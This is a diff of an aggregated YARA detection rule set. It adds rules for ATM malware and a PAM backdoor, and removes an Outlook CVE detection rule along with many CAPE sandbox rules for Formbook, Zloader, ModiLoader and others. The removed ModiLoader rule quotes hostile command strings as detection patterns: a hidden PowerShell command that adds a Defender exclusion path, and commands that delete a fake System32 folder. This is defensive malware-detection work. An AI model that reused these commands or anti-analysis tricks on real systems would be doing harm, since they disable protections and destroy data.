+		$CashInfo = "getNumberOfCashUnits" nocase ascii wide
+		$Dispense = "waitforbillstaken" nocase ascii wide
+		$Inject = "No code to inject!" nocase ascii wide
+		$config = ".Agentcli" nocase ascii wide
+		$log1 = "logft.log" nocase ascii wide
+		$log2 = ".loginside" nocase ascii wide
+
+	condition:
+		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
+}
 
 rule R3C0NST_ATM_CINEO4060_Blackbox : FILE
 {
@@ -60955,48 +60886,117 @@ rule R3C0NST_ATM_CINEO4060_Blackbox : FILE
 	condition:
 		( uint16( 0 ) == 0x4b50 and filesize < 50KB and all of ( $MyAgent* ) ) or ( uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and $Hook and $Delphi and all of ( $WMIHOOK* ) or all of ( $TRICK* ) )
 }
-rule R3C0NST_Exploit_Outlook_CVE_2023_23397 : CVE_2023_23397 FILE
+
+rule R3C0NST_ATM_Malware_Ploutusi : FILE
 {
 	meta:
-		description = "Detects Outlook appointments exploiting CVE-2023-23397"
+		description = "Detects Ploutus I .NET samples based on MetabaseQ report"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "02104112-6f81-5d19-935d-45cfcd2fa41c"
+		date = "2021-03-03"
+		modified = "2021-03-04"
+		reference = "https://www.metabaseq.com/recursos/ploutus-is-back-targeting-itautec-atms-in-latin-america"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Ploutus-I.yar#L3-L26"
+		license_url = "N/A"
+		logic_hash = "77100d300a40219187f5c4b8270f599a91652b69980fe450b791181b8c30b5a4"
+		score = 75
+		quality = 90
+		tags = "FILE"
+		hash1 = "4f6d4c6f97caf888a98a3097b663055b63e605f15ea8f7cc7347283a0b8424c1"
+		hash2 = "8ca29597152dc79bcf79394e1ae2635b393d844bb0eeef6709d37e6778457b31"
+		hash3 = "dce1f01c08937fb5c98964a0911de403eed2101a9d46c5eb9899755c40c3765a"
+		hash4 = "3a1d992277a862640a0835af9dff4b029cfc6c5451e9716f106efaf07702a98c"
+
+	strings:
+		$Code = {28 ?? 02 00 06 2a}
+
+	condition:
+		filesize < 300KB and $Code and pe.pdb_path contains "Diebold.pdb" and pe.imports ( "mscoree.dll" , "_CorExeMain" ) and ( for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . type == pe.RESOURCE_TYPE_VERSION and ( pe.version_info [ "InternalName" ] contains "Diebold.exe" ) ) )
+}
+
+rule R3C0NST_ATM_Malware_Dispenserxfs : FILE
+{
+	meta:
+		description = "No description has been set in the source file - R3c0nst"
 		author = "Frank Boldewin"
-		id = "7e355e5f-93ca-561d-9a12-f73f1d429e4d"
-		date = "2023-03-19"
-		modified = "2023-03-25"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/Exploit_Outlook_CVE_2023_23397.yar#L1-L30"
+		id = "52b1aa57-283b-54d7-bd1b-fb5da5f8d269"
+		date = "2019-02-27"
+		modified = "2019-02-28"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.DispenserXFS.yar#L3-L13"
 		license_url = "N/A"
-		logic_hash = "1847e8223b2f6d3ec5108e15ee46ef031ee1e26d3a5e8ed4a70c77b031f6a5b6"
+		logic_hash = "0e588e2ba03d5eb750183600cce278e791a71f86fbf933ba9d7fda352bd37e2f"
 		score = 75
-		quality = 86
-		tags = "CVE-2023-23397, FILE"
-		Author = "Frank Boldewin (@r3c0nst)"
-		Hash1 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
-		Hash2 = "a034427fd8524fd62380c881c30b9ab483535974ddd567556692cffc206809d1"
-		Hash3 = "e7a1391dd53f349094c1235760ed0642519fd87baf740839817d47488b9aef02"
-		Hash4 = "1543677037fa339877e1d6ef2d077f94613afbcd6434d7181a18df74aca7742b"
+		quality = 59
+		tags = "FILE"
 
 	strings:
-		$ipmtask = "IPM.Task" wide ascii
-		$ipmappointment = "IPM.Appointment" wide ascii
-		$ipmtaskb64 = "IPM.Task" base64 base64wide
-		$ipmappointmentb64 = "IPM.Appointment" base64 base64wide
-		$unc_path1 = { 5C 00 5C 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00 2E|3? 00 3? 00 2E|3? 00 3? 00 3? 00 2E) 00 (3? 00|3? 00 3? 00|3? 00 3? 00 3? 00) }
-		$unc_path2 = { 5C 5C (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3? 2E|3? 3? 2E|3? 3? 3? 2E) (3?|3? 3?|3? 3? 3?) }
-		$unc_a = "\x00\x00\x00\x5c\x5c" base64
-		$unc_w = "\x00\x00\x5c\x00\x5c" base64wide
-		$mail1 = "from:" ascii wide nocase
-		$mail2 = "received:" ascii wide nocase
+		$Code_Bytes = { 68 FF FF 00 00 68 60 EA 00 00 6A 10 }
+		$XFSKILL = "injected mxsfs killer into" nocase ascii wide
+		$PDB = "C:\\_bkittest\\dispenser\\Release_noToken\\dispenserXFS.pdb" nocase ascii wide
 
 	condition:
-		(( uint32be( 0 ) == 0xD0CF11E0 or uint32be( 0 ) == 0x789F3E22 ) or ( all of ( $mail* ) ) ) and ( ( $ipmtask or $ipmappointment ) or ( $ipmtaskb64 or $ipmappointmentb64 ) ) and ( ( $unc_path1 or $unc_path2 ) or ( $unc_a or $unc_w ) )
+		(hash.sha256 ( 0 , filesize ) == "867991ade335186baa19a227e3a044c8321a6cef96c23c98eef21fe6b87edf6a" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+}
+rule R3C0NST_ATM_Malware_Loup : FILE
+{
+	meta:
+		description = "Detects ATM Malware Loup"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "4786362f-b2c5-5b69-8b06-9216561286e6"
+		date = "2020-08-17"
+		modified = "2020-08-17"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/ATM.Malware.Loup.yar#L1-L16"
+		license_url = "N/A"
+		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		logic_hash = "39efced4ee3a6147acf5732e4be3a5e9859268b35b79f5e8e87d7c4d77a588c0"
+		score = 75
+		quality = 90
+		tags = "FILE"
+
+	strings:
+		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii nocase
+		$String2 = "CurrencyDispenser1" ascii nocase
+		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
+}
+rule R3C0NST_UNC2891_Slapstick : FILE
+{
+	meta:
+		description = "Detects UNC2891 Slapstick pam backdoor"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "a731acff-f657-5877-859e-7447230576df"
+		date = "2022-03-30"
+		modified = "2023-01-05"
+		reference = "https://github.com/fboldewin/YARA-rules/"
+		source_url = "https://github.com/fboldewin/YARA-rules//blob/54e9e6899b258b72074b2b4db6909257683240c2/UNC2891_Slapstick.yar#L1-L19"
+		license_url = "N/A"
+		logic_hash = "7777c3b850f5b7ee326be5461ebc3bf37fb201b67ada78b50575fb31f50adf9a"
+		score = 75
+		quality = 90
+		tags = "FILE"
+		hash1 = "9d0165e0484c31bd4ea467650b2ae2f359f67ae1016af49326bb374cead5f789"
+
+	strings:
+		$code1 = {F6 50 04 48 FF C0 48 39 D0 75 F5}
+		$code2 = {88 01 48 FF C1 8A 11 89 C8 29 F8 84 D2 0F 85}
+		$str1 = "/proc/self/exe" fullword ascii
+		$str2 = "%-23s %-23s %-23s %-23s %-23s %s" fullword ascii
+		$str3 = "pam_sm_authenticate" ascii
+		$str4 = "ACCESS GRANTED & WELCOME" xor
+
+	condition:
+		uint32( 0 ) == 0x464c457f and filesize < 100KB and ( all of ( $code* ) or all of ( $str* ) )
 }
 /*
  * YARA Rule Set
  * Repository Name: CAPE
  * Repository: https://github.com/kevoreilly/CAPEv2
- * Retrieval Date: 2026-02-22
- * Git Commit: 7ace95378cd09c8e26138125761b13750dfc6cb4
+ * Retrieval Date: 2026-03-01
+ * Git Commit: a9a0887dab232f52c59e955b9984dd494c47ce6b
  * Number of Rules: 185
  * Skipped: 0 (age), 18 (quality), 3 (score), 0 (importance)
  *
@@ -61662,509 +61662,63 @@ License, Version 2.0.
 
 The files bootstrap.min.js, bootstrap.min.css, bootstrap-responsive.min.css,
 glyphicons-halflings.png, glyphicons-halflings-white.png are copyrighted by Twitter, Inc.
-and licensed under the Apache License, Version 2.0.
-
-The file analyzer/windows/modules/amsi.py uses parts of pywintrace
-(https://github.com/fireeye/pywintrace), which is copyrighted by FireEye, Inc. and licensed
-under the Apache License, Version 2.0.
-
- */
-rule CAPE_Formhooka
-{
-	meta:
-		description = "Formbook Anti-hook Bypass"
-		author = "kevoreilly"
-		id = "6369de74-99eb-57ae-a315-c15f22effc73"
-		date = "2021-03-07"
-		modified = "2025-12-08"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Formbook.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "21b8101a7039cfad0e9d49cc1f055bc23a2eb4c973dcda2a81a007e452d77a6d"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$remap_ntdll_0,action0=setedx:ntdll,count0=1,bp1=$remap_ntdll_1,action1=setdst:ntdll,count1=1"
-		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
-		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
-
-	strings:
-		$remap_ntdll_0 = {33 56 04 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-		$remap_ntdll_1 = {33 56 0C 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
-
-	condition:
-		any of them
-}
-rule CAPE_Formconfa
-{
-	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "f9c3fc92-e2c8-5968-b0f4-80bd8199b7ca"
-		date = "2021-03-07"
-		modified = "2025-12-08"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Formbook.yar#L32-L44"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "b0aa4cec55a21245d8104380c531dd6cc0fdef64fbefd79616eadfb4e95b2d75"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$c2,action0=string:rcx+1,bp1=$decoy+67,action1=string:rcx+1,count=0,typestring=Formbook Config"
-		packed = "b8e44f4a0d92297c5bb5b217c121f0d032850b38749044face2b0014e789adfb"
-
-	strings:
-		$c2 = {44 8B C6 48 8B D3 49 8B CE E8 [4] 44 88 23 41 8B DD 48 8D [2] 66 66 66 0F 1F 84 00 00 00 00 00 BA 8D 00 00 00 41 FF C4}
-		$decoy = {8B D7 0F 1F 44 00 00 0F B6 03 FF C0 48 98 48 03 D8 48 FF CA 75 ?? 44 0F B6 03 48 8D 53 01 48 8D 4C [2] E8}
-
-	condition:
-		all of them
-}
-rule CAPE_Formhelper
-{
-	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "88ff1354-1ae7-5380-a586-ef95212d59df"
-		date = "2021-03-07"
-		modified = "2025-12-08"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Formbook.yar#L46-L58"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "77cdfc94aac089c4f2590f4afbab35351fc6e104e67813548c68c59d27019a63"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp2=$config,action2=scan,count=0"
-		packed = "0270016f451f9ba630f2ea4e2ea006fb89356627835b560bb2f4551a735ba0e1"
-
-	strings:
-		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 ?? 33 C0 4C 8B E9 4C 89}
-		$decode = {66 66 66 66 0F 1F 84 00 00 00 00 00 0F B6 41 01 48 FF C9 28 41 01 49 FF C9}
-
-	condition:
-		all of them
-}
-rule CAPE_Formconfb
-{
-	meta:
-		description = "Formbook Config Extraction"
-		author = "kevoreilly"
-		id = "46d78206-578b-5e12-b466-cd81610a5008"
-		date = "2021-03-07"
-		modified = "2025-12-08"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Formbook.yar#L60-L75"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d21596f25daea284790984b4ea0ba9c2764b94832791f43f9bb582085eaf6492"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "clear,bp0=$c2_1,bp0=$c2_2,action0=string:rcx,bp1=$decoy,action1=string:rdi,bp2=$config,action2=scan,bp3=$sleep+5,action3=skip,count=0,typestring=Formbook Config"
-		packed = "60571b2683e7b753a77029ebe9b5e1cb9f3fbfa8d6a43e4b7239eefd13141ae4"
-
-	strings:
-		$c2_1 = {44 0F B6 5D ?? 45 84 DB 74 ?? 48 8D 4D [1-5] 41 80 FB 2F 74 11 0F B6 41 01 48 FF C1 FF C3 44 0F B6 D8 84 C0 75}
-		$c2_2 = {40 53 48 83 EC 20 48 8B DA 48 85 C9 74 28 80 39 00 74 23 48 85 D2 74 1E 48 8B D1 41 B8 04 00 00 00 48 8B CB E8}
-		$decoy = {44 8D 1C 33 [0-13] 48 8D 7D [1-5] 42 C6 44 [2] 00 [0-4] 48 8B CF E8}
-		$config = {40 55 53 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 [4] 48 81 EC [2] 00 00 45 33 F6 33 C0 4C 8B E9 4C 89 75}
-		$sleep = {B9 88 13 00 00 FF D7 44 8B 9B [4] 41 81 FB 00 01 00 00 75 ?? 48 39 B3 [4] 74 ?? 8B 83 [4] 05 00 20 00 00 39 B0}
-
-	condition:
-		2 of them
-}
-rule CAPE_Xworm
-{
-	meta:
-		description = "XWorm Config Extractor"
-		author = "kevoreilly"
-		id = "0f55dbfb-c239-53f2-a1e0-bfa494558d6e"
-		date = "2023-11-07"
-		modified = "2023-11-07"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/XWorm.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "d8e103f3470e83d71cd4992b74698c0721b8a69d764fdb7a4543997b2853014a"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$decrypt+11,action0=string:r10,count=1,typestring=XWorm Config"
-
-	strings:
-		$decrypt = {45 33 C0 39 09 FF 15 [4] 48 8B F0 E8 [4] 48 8B C8 48 8B D6 48 8B 00 48 8B 40 68 FF 50 ?? 90}
-
-	condition:
-		any of them
-}
-rule CAPE_Modiloader : FILE
-{
-	meta:
-		description = "ModiLoader detonation shim"
-		author = "kevoreilly"
-		id = "64f9aa51-d668-5d40-9781-c26970acf781"
-		date = "2023-10-19"
-		modified = "2025-01-31"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/ModiLoader.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "1f0cbf841a6bc18d632e0bc3c591266e77c99a7717a15fc4b84d3e936605761f"
-		logic_hash = "9e64e0c40192cc832a1ffa7b3ac65a704596af82515d03706cd7aa1f4498f32f"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "exclude-apis=NtAllocateVirtualMemory:NtProtectVirtualMemory"
-
-	strings:
-		$epilog1 = {81 C2 A1 03 00 00 87 D1 29 D3 33 C0 5A 59 59 64 89 10 68}
-		$epilog2 = {6A 00 6A 01 8B 45 ?? 50 FF 55 ?? 33 C0 5A 59 59 64 89 10 68}
-
-	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-rule CAPE_Modiloaderold : FILE
-{
-	meta:
-		description = "ModiLoader detonation shim"
-		author = "ditekSHen"
-		id = "2b3fd8ec-b672-574b-9b50-1a9ca9f43299"
-		date = "2023-10-19"
-		modified = "2025-01-31"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/ModiLoader.yar#L15-L53"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "fc006377e6d41515503b0b234ff87f59d930a7d9f8b32d2e072de79b9c52ddc4"
-		score = 75
-		quality = 66
-		tags = "FILE"
-		cape_options = "ntdll-protect=0"
-
-	strings:
-		$x1 = "*()%@5YT!@#G__T@#$%^&*()__#@$#57$#!@" fullword wide
-		$x2 = "dntdll" fullword wide
-		$x3 = "USERPROFILE" fullword wide
-		$s1 = "%s, ProgID: \"%s\"" ascii
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$s3 = "responsetext" ascii
-		$s4 = "C:\\Users\\Public\\" ascii
-		$s5 = "[InternetShortcut]" fullword ascii
-		$c1 = "start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command \"Add-MpPreference -ExclusionPath 'C:\\Users'\" & exit" ascii nocase
-		$c2 = "mkdir \"\\\\?\\C:\\Windows \"" ascii nocase
-		$c3 = "mkdir \"\\\\?\\C:\\Windows \\System32\"" ascii nocase
-		$c4 = "ECHO F|xcopy \"" ascii nocase
-		$c5 = "\"C:\\Windows \\System32\" /K /D /H /Y" ascii nocase
-		$c6 = "ping 127.0.0.1 -n 6 > nul" ascii nocase
-		$c7 = "del /q \"C:\\Windows \\System32\\*\"" ascii nocase
-		$c8 = "rmdir \"C:\\Windows \\System32\"" ascii nocase
-		$c9 = "rmdir \"C:\\Windows \"" ascii nocase
-		$g1 = "powershell" ascii nocase
-		$g2 = "mkdir \"\\\\?\\C:\\" ascii nocase
-		$g3 = "\" /K /D /H /Y" ascii nocase
-		$g4 = "ping 127.0.0.1 -n" ascii nocase
-		$g5 = "del /q \"" ascii nocase
-		$g6 = "rmdir \"" ascii nocase
-
-	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $x* ) and ( all of ( $g* ) or ( 2 of ( $s* ) and 2 of ( $c* ) ) ) ) or ( all of ( $s* ) and ( 2 of ( $c* ) or all of ( $g* ) ) ) or ( 4 of ( $c* ) and ( 1 of ( $x* ) or 2 of ( $s* ) ) ) or ( all of ( $g* ) and 4 of ( $c* ) ) or 13 of them )
-}
-rule CAPE_Vbcrypter
-{
-	meta:
-		description = "VBCrypter anti-hook Bypass"
-		author = "kevoreilly"
-		id = "2e010dfd-5096-5e81-af9b-174322a47d87"
-		date = "2021-03-28"
-		modified = "2021-03-28"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/VBCrypter.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "a62bca62ab624ab1a2c2e612c5b7e6d543006026a49c07c46800499e31e41c4e"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$antihook-12,action0=jmp,count=0"
-
-	strings:
-		$antihook = {43 39 C3 0F 84 ?? 00 00 00 80 3B B8 75 ?? 83 7B 01 00 75 ?? 80 7B 05 BA 75 ?? 8B 53 06 83 C3 0A 31 C9}
-
-	condition:
-		any of them
-}
-rule CAPE_Bumblebee : FILE
-{
-	meta:
-		description = "BumbleBee Anti-VM Bypass"
-		author = "enzo & kevoreilly"
-		id = "85e2c9fd-86de-57c8-99ec-de2cc3996876"
-		date = "2022-04-21"
-		modified = "2023-02-08"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BumbleBee.yar#L34-L46"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0a632a0b30b28d544880eb1cfdd85e95f455c343d60f8d6922d4196ef7415961"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$antivm1+2,bp1=$antivm2+2,bp1=$antivm3+38,action0=jmp,action1=skip,count=0,force-sleepskip=1"
-
-	strings:
-		$antivm1 = {84 C0 74 09 33 C9 FF [4] 00 CC 33 C9 E8 [3] 00 4? 8B C8 E8}
-		$antivm2 = {84 C0 0F 85 [2] 00 00 33 C9 E8 [4] 48 8B C8 E8 [4] 48 8D 85}
-		$antivm3 = {33 C9 E8 [4] 48 8B C8 E8 [4] 83 CA FF 48 8B 0D [4] FF 15 [4] E8 [4] 84 c0}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and any of them
-}
-rule CAPE_Zloader : FILE
-{
-	meta:
-		description = "Zloader API Spam Bypass"
-		author = "kevoreilly"
-		id = "8a8e7102-1138-59e7-95a6-8647d41d8521"
-		date = "2021-03-12"
-		modified = "2024-05-03"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Zloader.yar#L1-L12"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "319adca805083c7f5854fe840447cf961addbd748f1f25eb8ec8cdeed7af38aa"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$trap1-5,action0=hooks:0,bp1=$traps-108,action1=jmp:15,bp2=$traps-88,action2=hooks:1,count=0"
-
-	strings:
-		$trap1 = {81 F7 4C 01 00 00 8D B4 37 [2] FF FF 31 FE 69 FE 95 03 00 00 E8 [4] 31 FE 0F AF FE 0F AF FE E8}
-		$traps = {6A 44 53 E8 [2] FF FF 83 C4 08 8D 85 ?? FF FF FF C7 85 ?? FF FF FF 44 00 00 00 50}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and any of them
-}
-rule CAPE_Zloader_2024 : FILE
-{
-	meta:
-		description = "Zloader Registry and Modulename Bypass"
-		author = "enzok"
-		id = "7100c27e-021f-552c-9a75-84b07a2f837e"
-		date = "2021-03-12"
-		modified = "2024-05-03"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/Zloader.yar#L14-L26"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "38d555ef5f613cf7ca043697c479100a7a22e7f043acf8b6a46f8009eb92fd7e"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$reg_1*+1,bp0=$reg_2*+1,action0=seteax:1,count=0"
-
-	strings:
-		$reg_1 = {FF D0 83 F8 00 0F 94 C0 24 01 88 44 24 ?? 4? 8B [3] B? [9-25] E8 [4] 4? 89 F1 FF D0 8A [3] 24 01 0F B6 C0}
-		$reg_2 = {B9 [4] E8 [4] 8B [3] 89 C2 E8 [4] 4? [4] ff D0 8A [3] 24 01 0F B6 C0}
-		$name_1 = {56 5? 5? 4? 81 EC [4] C7 44 24 ?? 00 00 00 00 4? 8D 0D [4] E8 [4] 4? 89 [3] 4? 83 [3] 00 75}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
-}
-rule CAPE_Buerloader : FILE
-{
-	meta:
-		description = "BuerLoader RDTSC Trap Bypass"
-		author = "kevoreilly"
-		id = "38f01199-6bd2-5519-b570-8c0f46e74286"
-		date = "2021-03-13"
-		modified = "2021-03-13"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/BuerLoader.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6f9f9b4c01251c0643c61701084cca2bdfeea08ca95f982355565cf05483d940"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "bp0=$trap+43,action0=skip,count=0"
-
-	strings:
-		$trap = {0F 31 89 45 ?? 6A 00 8D 45 ?? 8B CB 50 E8 [4] 0F 31}
-
-	condition:
-		uint16( 0 ) == 0x5A4D and any of them
-}
-rule CAPE_Heavenssyscall : FILE
-{
-	meta:
-		description = "Bypass variants of heaven's gate direct syscalls"
-		author = "kevoreilly"
-		id = "7c60102a-ac8b-5e28-8dbb-4b6c3f4cddff"
-		date = "2024-03-25"
-		modified = "2024-03-25"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/HeavensSyscall.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "aeb981fcba0936ff8b1be4c601445fd45e5d3b74856a9439d351edd57f5a50c3"
-		score = 75
-		quality = 70
-		tags = "FILE"
-		cape_options = "clear,br0=$gate1-9,action1=seteax:0,count=0,sysbp=$sysenter+10"
-		packed = "2950b4131886e06bdb83ab1611b71273df23b0d31a4d8eb6baddd33327d87ffa"
-
-	strings:
-		$gate1 = {00 00 00 00 74 24 8D 45 F8 50 6A FF FF 95 [4] 85 C0 74 08 8B 4D F8 89 4D FC EB 07 C7 45 FC 00 00 00 00 8B 45 FC EB 02 33 C0 8B E5 5D C2 C0}
-		$sysenter = {68 [4] E8 [4] E8 [4] C2 ?? 00 CC CC CC CC CC CC CC CC}
-
-	condition:
-		uint16( 0 ) == 0x8B55 and all of them
-}
-rule CAPE_Gettickcountantivm
-{
-	meta:
-		description = "GetTickCountAntiVM bypass"
-		author = "kevoreilly"
-		id = "d90b9768-0525-5963-9817-e3a53b1d4cf3"
-		date = "2021-12-14"
-		modified = "2022-02-25"
-		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/analyzer/windows/data/yara/GetTickCountAntiVM.yar#L1-L20"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "662bc7839ed7ddd82d5fdafa29fafd9a9ec299c28820fe4104fbba9be1a09c42"
-		hash = "00f1537b13933762e1146e41f3bac668123fac7eacd0aa1f7be0aa37a91ef3ce"
-		hash = "549bca48d0bac94b6a1e6eb36647cd007fed5c0e75a0e4aa315ceabdafe46541"
-		hash = "90c29a66209be554dfbd2740f6a54d12616da35d0e5e4af97eb2376b9d053457"
-		logic_hash = "9cdb0b2d2e058e1858c2f2baad67005a2019fbbdcb7ca54571c8d20dfbf33471"
-		score = 75
-		quality = 70
-		tags = ""
-		cape_options = "bp0=$antivm1-13,bp0=$antivm5-40,bp0=$antivm6,action0=wret,hc0=1,bp1=$antivm2-6,action1=wret,hc1=1,count=1,bp2=$antivm3+42,action2=jmp:96,bp3=$antivm4-9,action3=wret,hc3=1"
-
-	strings:
-		$antivm1 = {57 FF D6 FF D6 BF 01 00 00 00 FF D6 F2 0F 10 0D [4] 47 66 0F 6E C7 F3 0F E6 C0 66 0F 2F C8 73}
-		$antivm2 = {F2 0F 11 45 ?? FF 15 [4] 6A 00 68 10 27 00 00 52 50 E8 [4] 8B C8 E8 [4] F2 0F 59 45}
